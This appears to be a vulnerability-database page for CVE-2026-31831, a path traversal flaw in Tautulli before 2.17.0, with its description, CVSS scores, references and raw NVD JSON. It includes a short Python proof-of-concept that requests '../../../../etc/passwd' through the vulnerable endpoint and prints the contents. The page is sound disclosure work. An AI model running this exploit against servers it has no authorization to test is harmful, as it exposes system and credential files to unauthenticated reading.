CVE-2026-31831

Description

Tautulli is a Python based monitoring and tracking tool for Plex Media Server. Prior to version 2.17.0, the /newsletter/image/images API endpoint is vulnerable to path traversal, allowing unauthenticated attackers to read arbitrary files from the application server's filesystem. This issue has been patched in version 2.17.0.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:tautulli:tautulli:*:*:*:*:*:*:*:* - VULNERABLE

Tautulli < 2.17.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (Replace with actual target)
target_url = "http://localhost:8181"

# Vulnerable endpoint and payload for path traversal
# Attempting to read /etc/passwd
payload = "../../../../etc/passwd"
vulnerable_endpoint = f"{target_url}/newsletter/image/images?file={payload}"

try:
    response = requests.get(vulnerable_endpoint)
    
    if response.status_code == 200:
        print("[+] Vulnerability confirmed!")
        print("[+] File content:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-31831
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-31831
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-31831/
[4] VulDB https://vuldb.com/cve/CVE-2026-31831
[5] https://github.com/Tautulli/Tautulli/releases/tag/v2.17.0
[6] https://github.com/Tautulli/Tautulli/security/advisories/GHSA-xp55-2pf4-fv8m
[7] https://github.com/Tautulli/Tautulli/security/advisories/GHSA-xp55-2pf4-fv8m

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-31831", "sourceIdentifier": "[email protected]", "published": "2026-03-30T20:16:21.673", "lastModified": "2026-04-02T15:42:45.983", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tautulli is a Python based monitoring and tracking tool for Plex Media Server. Prior to version 2.17.0, the /newsletter/image/images API endpoint is vulnerable to path traversal, allowing unauthenticated attackers to read arbitrary files from the application server's filesystem. This issue has been patched in version 2.17.0."}, {"lang": "es", "value": "Tautulli es una herramienta de monitoreo y seguimiento basada en Python para Plex Media Server. Antes de la versión 2.17.0, el endpoint de la API /newsletter/image/images es vulnerable a salto de ruta, permitiendo a atacantes no autenticados leer archivos arbitrarios del sistema de archivos del servidor de aplicaciones. Este problema ha sido parcheado en la versión 2.17.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-23"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tautulli:tautulli:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.17.0", "matchCriteriaId": "A0B5F451-819C-4ADA-BFFA-EDA898A7D082"}]}]}], "references": [{"url": "https://github.com/Tautulli/Tautulli/releases/tag/v2.17.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/Tautulli/Tautulli/security/advisories/GHSA-xp55-2pf4-fv8m", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/Tautulli/Tautulli/security/advisories/GHSA-xp55-2pf4-fv8m", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}